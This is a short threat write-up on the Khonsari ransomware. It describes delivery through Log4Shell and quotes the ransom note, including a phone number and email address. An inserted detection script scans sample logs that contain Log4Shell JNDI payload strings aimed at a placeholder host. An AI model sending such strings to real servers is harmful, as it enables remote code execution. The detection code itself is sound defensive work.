Khonsari Ransomware

The Khonsari Ransomware is a brand new piece of ransomware designed to attack Windows-based PCs. To deliver it, the crooks behind the ransomware exploit the recently found CVE-2021-44228 vulnerability, also known as Log4Shell, Logjam and Log4j. The latter is a critical flaw that lets attackers execute code remotely on unpatched servers, hijack them and enlist them in a botnet.

Unlike other popular pieces of ransomware currently in circulation, Khonsari does not spread via spam mail or malvertising. To infect a PC with Khonsari, the crooks in charge must first exploit the vulnerability mentioned above to force the targeted system to download and run arbitrary code. Once executed, that code gives the cybercriminals total control over the targeted system and endless opportunities to plant all sorts of malware, including Khonsari.
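An added detection check for the Log4Shell exploitation step described above; it is not code from the original page or its author. It scans constructed web-server access-log lines for Log4j lookup strings, first undoing URL encoding and the `${lower:}`/`${upper:}` wrapping that is commonly used to hide them. The log lines and the 203.0.113.x addresses are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page).
# 203.0.113.0/24 is a documentation address range, not a real attacker host.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%2Fx%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:dns://203.0.113.10/ok}"',
]

# ${lower:x} / ${upper:x} wrappers evaluate to x; fold them away before matching.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# A Log4j JNDI lookup: "${jndi:" followed by a scheme such as ldap, rmi or dns.
_JNDI = re.compile(r"\$\{jndi:[a-z]+:", re.IGNORECASE)


def normalize(text: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding, unwrap lower/upper lookups, lowercase."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    prev = None
    while prev != text:  # repeat until no nested wrappers remain
        prev = text
        text = _NESTED.sub(r"\1", text)
    return text.lower()


def scan_line(line: str):
    """Return the normalized lookup string found in a log line, or None."""
    norm = normalize(line)
    match = _JNDI.search(norm)
    if not match:
        return None
    end = norm.find("}", match.end())
    return norm[match.start(): end + 1 if end != -1 else None]


def scan(lines):
    """Return (line_index, lookup_string) for every line that carries a JNDI lookup."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := scan_line(line))]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LOGS):
        print(f"line {idx}: {hit}")
```

A hit means an exploitation attempt reached the server, not that it succeeded; the decisive follow-up is checking whether the host is running a Log4j version affected by CVE-2021-44228 and whether outbound connections to the referenced address followed.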

Should the adversary decide to launch a Khonsari infection at this stage, the ransomware encrypts many file types and generates the following ransom note:

'Your files have been encrypted and stolen by the Khonsari family. If you wish to decrypt, call (225) 287-1309 or email karenkhonsari@gmail.com. If you do not know how to buy btc, use a search engine to find exchanges. DO NOT MODIFY OR DELETE THIS FILE OR ANY ENCRYPTED FILES. IF YOU DO, YOUR FILES MAY BE UNRECOVERABLE.'

The note is pretty basic in terms of instructions, and so is the Khonsari Ransomware itself. The Khonsari payload is just 12KB in size, which explains why it is far less sophisticated than other notable threats out there. Researchers speculate that the contact details provided in the ransom note may be a false flag and that Karen Khonsari may be a real person. However, they have yet to confirm that theory, which is why the Khonsari Ransomware poses severe risks for the time being.
